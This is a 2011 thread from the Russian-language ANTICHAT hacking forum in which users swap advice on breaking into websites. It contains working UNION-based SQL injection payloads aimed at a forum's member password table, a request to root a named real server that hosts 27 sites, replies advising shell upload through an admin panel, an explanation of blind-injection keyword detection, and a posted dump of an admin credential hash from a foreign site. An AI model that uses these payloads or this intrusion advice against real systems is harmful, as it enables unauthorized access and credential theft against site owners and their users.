ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.01.2011, 19:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
191387
Репутация:
6
|
|
mysql 5 версия
Сообщение от None
-1+union+Select+1,2,3,4,5,6,7+from+table1.ibf_membe rs+--+
выводимые поля 2 и 3
не выводит
Сообщение от None
-1+union+Select+1,password,3,4,5,6,7+from+table1.ib f_members+--+
не выводит
Сообщение от None
-1+union+Select+1,unhex(hex(password)),3,4,5,6,7+fr om+table1.ibf_members+--+
Сообщение от None
-1+union+Select+1,aes_decrypt(aes_encrypt(password) ),3,4,5,6,7+from+table1.ibf_members+--+
тоже не выводит
group_concat, concat пробовал
из другой любой кроме ibf_members выводит данные, как обойти? |
|
|
|
12.01.2011, 20:00
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
мб написать count(password) и увидеть 0? если всё таки с group_concat не прокатило
|
|
|
13.01.2011, 02:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
800
Репутация:
0
|
|
Есть сайтик www.mirdoors.ru на сервере лежит еще 27 разных сайтов, требуется как нить порутать сервак , нашел на 4 сайтах SQL,и file_priv нету, что можно сделать ?
|
|
|
|
13.01.2011, 02:06
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от Modex
Modex said:
Есть сайтик www.mirdoors.ru на сервере лежит еще 27 разных сайтов, требуется как нить порутать сервак , нашел на 4 сайтах SQL,и file_priv нету, что можно сделать ?
я так понимаю что шeлл у тебя там есть , если ты предлагаешь порутать , и если порутать то давай в студию uname -a
|
|
|
|
13.01.2011, 02:23
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от Modex
Modex said:
Есть сайтик, на сервере лежит еще 27 разных сайтов, требуется как нить порутать сервак , нашел на 4 сайтах SQL,и file_priv нету, что можно сделать ?
Через админку заливайся, раз прав нет.
Как зальешься, тебе сюда /thread235697.html
|
|
|
|
13.01.2011, 09:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
191387
Репутация:
6
|
|
в SQLI Helper - Blind Dump есть поле Keyword True что оно означает и что нужно туда писать, для Joomla например
|
|
|
|
13.01.2011, 09:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Вообще в софте подобного рода поле Keyword обозначает слово, которое возвращается из запроса в случае TRUE и в случае FALSE,
например
http://site/bug?id=1 (в титле выводит "Article 1")
http://site/bug?id=1+and+1=1 (в титле выводит "Article 1")
http://site/bug?id=1+and+1=0 (в титле ничего не выводит)
тогда в этом случае слово "Article 1" будет значением для Keyword
|
|
|
|
13.01.2011, 09:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
191387
Репутация:
6
|
|
Сообщение от Expl0ited
Expl0ited said:
Вообще в софте подобного рода поле Keyword обозначает слово, которое возвращается из запроса в случае TRUE и в случае FALSE,
например
http://site/bug?id=1 (в титле выводит "Article 1")
http://site/bug?id=1+and+1=1 (в титле выводит "Article 1")
http://site/bug?id=1+and+1=0 (в титле ничего не выводит)
тогда в этом случае слово "Article 1" будет значением для Keyword
А обязательно в титле брать значени Keyword-а
или можно любое значение которое исчезает на странице?
|
|
|
|
13.01.2011, 10:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Необязательно, значение Keyword это выводимые из БД данные
|
|
|
|
13.01.2011, 14:09
|
|
Новичок
Регистрация: 14.06.2010
Сообщений: 0
Провел на форуме:
930
Репутация:
0
|
|
Вообщем наковырял паролей (хешей),но они все вот такиесайт пакистанский)
superadmin:С/FSс�ЅБvрЛ�ґ�Ј�ѓЊУ�N$Ї
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
